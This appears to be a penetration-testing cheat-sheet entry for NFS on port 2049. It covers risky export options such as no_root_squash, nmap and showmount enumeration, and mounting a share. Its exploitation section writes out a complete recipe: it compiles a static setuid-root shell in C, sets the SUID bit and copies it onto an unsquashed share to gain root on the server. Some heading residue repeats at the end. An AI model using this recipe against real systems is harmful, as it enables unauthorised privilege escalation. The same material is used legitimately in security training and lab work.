NFS - 2049

The Network File System (NFS) is a distributed file system protocol that allows a user on a client computer to access files over a network much like local storage is accessed. It enables file sharing across different systems and platforms using a client-server architecture, commonly used in Unix/Linux environments.

Default port: 2049

Dangerous Permissions

# Check dangerous NFS options (from nmap scripts or /etc/exports info):
# - no_root_squash: root on client = root on server (dangerous)
# - insecure: allows high ports (>1024)
# - rw: write access
# - sync: sync write (safer)

Enumeration

# Scan for RPC and NFS services
nmap -p111,2049 -sCV 10.10.10.10

# Script Scan with NFS Scripts
nmap --script nfs* -p111,2049 -sV 10.10.10.10

# List exported NFS shares
showmount -e 10.10.10.10

# Mount NFS share (nolock avoids locking issues)
mkdir mount-me
sudo mount -t nfs 10.10.10.10:/mnt/nfs ./mount-me -o nolock
cd mount-me

# Unmount
sudo umount ./mount-me

Exploitation

# Use SUID escalation if root access isn't squashed

# Compile statically linked SUID shell (so it runs without external libs)
echo -e '#include <unistd.h>\nint main() { setuid(0); system("/bin/sh"); return 0; }' > shell.c
gcc -static shell.c -o shell
chmod +s shell
cp shell mount-me/

# Now run the 'shell' binary from the shell to get root shell.

Enumeration​

Exploitation​

Enumeration

Exploitation